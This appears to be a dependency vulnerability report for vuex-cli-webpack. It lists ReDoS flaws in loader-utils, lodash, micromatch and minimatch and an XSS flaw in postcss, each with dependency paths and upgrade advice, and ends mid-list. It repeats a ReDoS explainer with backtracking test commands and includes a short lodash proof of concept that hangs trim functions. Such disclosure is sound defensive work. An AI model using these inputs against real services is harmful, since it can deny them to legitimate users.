Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade loader-utils to version 1.4.2, 2.0.4, 3.2.1 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: loader-utils
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-loader@6.4.1 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 extract-text-webpack-plugin@1.0.1 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 file-loader@0.9.0 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 html-webpack-plugin@2.30.1 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 imports-loader@0.6.5 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-loader@0.9.1 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 vue-style-loader@1.0.0 loader-utils@0.2.17
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack@1.15.0 loader-utils@0.2.17

Overview

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in interpolateName function via the URL variable.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade loader-utils to version 1.4.2, 2.0.4, 3.2.1 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: lodash
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 eslint@1.10.3 inquirer@0.11.4 lodash@3.10.1

Overview

lodash is a modern JavaScript utility library delivering modularity, performance, & extras.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.

POC

var lo = require('lodash');

function build_blank (n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "
}

return ret + "1";
}

var s = build_blank(50000)
var time0 = Date.now();
lo.trim(s)
var time_cost0 = Date.now() - time0;
console.log("time_cost0: " + time_cost0)

var time1 = Date.now();
lo.toNumber(s)
var time_cost1 = Date.now() - time1;
console.log("time_cost1: " + time_cost1)

var time2 = Date.now();
lo.trimEnd(s)
var time_cost2 = Date.now() - time2;
console.log("time_cost2: " + time_cost2)

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade lodash to version 4.17.21 or higher.

References

medium severity

Inefficient Regular Expression Complexity

  • Vulnerable module: micromatch
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-cli@6.26.0 chokidar@1.7.0 anymatch@1.3.2 micromatch@2.3.11
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack@1.15.0 watchpack@0.2.9 chokidar@1.7.0 anymatch@1.3.2 micromatch@2.3.11
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 sane@1.7.0 anymatch@1.3.2 micromatch@2.3.11
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 babel-cli@6.26.0 chokidar@1.7.0 readdirp@2.2.1 micromatch@3.1.10
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 webpack@1.15.0 watchpack@0.2.9 chokidar@1.7.0 readdirp@2.2.1 micromatch@3.1.10
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 jspm-npm@0.30.5 readdirp@2.2.1 micromatch@3.1.10
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 pkg-resolve@0.1.14 jspm@0.17.0-beta.49 liftoff@2.5.0 findup-sync@2.0.0 micromatch@3.1.10

Overview

Affected versions of this package are vulnerable to Inefficient Regular Expression Complexity due to the use of unsafe pattern configurations that allow greedy matching through the micromatch.braces() function. An attacker can cause the application to hang or slow down by passing a malicious payload that triggers extensive backtracking in regular expression processing.

Remediation

Upgrade micromatch to version 4.0.8 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: minimatch
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 mocha@2.5.3 glob@3.2.11 minimatch@0.3.0

Overview

minimatch is a minimal matching utility.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the braceExpand function in minimatch.js.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade minimatch to version 3.0.5 or higher.

References

medium severity
new

Cross-site Scripting (XSS)

  • Vulnerable module: postcss
  • Introduced through: vuex-cli-webpack@1.0.15

Detailed paths

  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-browser-reporter@0.5.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-custom-properties@5.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-font-variant@2.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-import@8.2.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-loader@0.9.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-mixins@5.4.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-reporter@1.4.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-url@5.1.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 vue-loader@8.7.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 autoprefixer@6.7.7 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 autoprefixer@6.7.7 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 vue-loader@8.7.1 autoprefixer@6.7.7 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-calc@5.3.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-calc@5.3.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-colormin@2.2.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-convert-values@2.6.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-discard-comments@2.0.4 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-discard-duplicates@2.1.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-discard-empty@2.1.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-discard-overridden@0.1.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-discard-unused@2.2.3 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-filter-plugins@2.0.3 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-merge-idents@2.1.7 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-merge-longhand@2.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-merge-rules@2.1.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-minify-font-values@1.0.5 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-minify-gradients@1.0.5 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-minify-params@1.2.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-minify-selectors@2.1.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-normalize-charset@1.1.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-normalize-url@3.0.8 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-ordered-values@2.2.3 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-reduce-idents@2.4.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-reduce-initial@1.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-reduce-transforms@1.0.4 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-svgo@2.1.6 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-unique-selectors@2.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 cssnano@3.10.0 postcss-zindex@2.2.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 pixrem@3.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 pleeease-filters@3.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-apply@0.3.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-attribute-case-insensitive@1.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-function@2.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-gray@3.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-hex-alpha@2.0.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-hsl@1.0.5 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-hwb@2.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-rebeccapurple@2.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-rgb@1.1.4 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-color-rgba-fallback@2.2.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-custom-media@5.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-custom-properties@5.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-selector-matches@2.0.5 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-custom-selectors@3.0.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-font-family-system-ui@1.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-font-variant@2.0.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-initial@1.5.3 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-media-minmax@2.1.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-nesting@2.3.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-pseudo-class-any-link@1.0.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-pseudoelements@3.0.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-replace-overflow-wrap@1.0.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-cssnext@2.11.0 postcss-selector-not@2.0.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-mixins@5.4.1 postcss-js@0.2.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-mixins@5.4.1 postcss-simple-vars@3.1.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 postcss-mixins@5.4.1 sugarss@0.2.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 autoprefixer@6.7.7 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-calc@5.3.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-colormin@2.2.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-convert-values@2.6.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-discard-comments@2.0.4 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-discard-duplicates@2.1.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-discard-empty@2.1.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-discard-overridden@0.1.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-discard-unused@2.2.3 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-filter-plugins@2.0.3 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-merge-idents@2.1.7 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-merge-longhand@2.0.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-merge-rules@2.1.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-minify-font-values@1.0.5 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-minify-gradients@1.0.5 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-minify-params@1.2.2 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-minify-selectors@2.1.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-normalize-charset@1.1.1 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-normalize-url@3.0.8 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-ordered-values@2.2.3 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-reduce-idents@2.4.0 postcss@5.2.18
  • Introduced through: vuex-cli@sokis/vuex-cli vuex-cli-webpack@1.0.15 css-loader@0.23.1 cssnano@3.10.0 postcss-reduce-initial@1.0.1 postcss@5.2.18
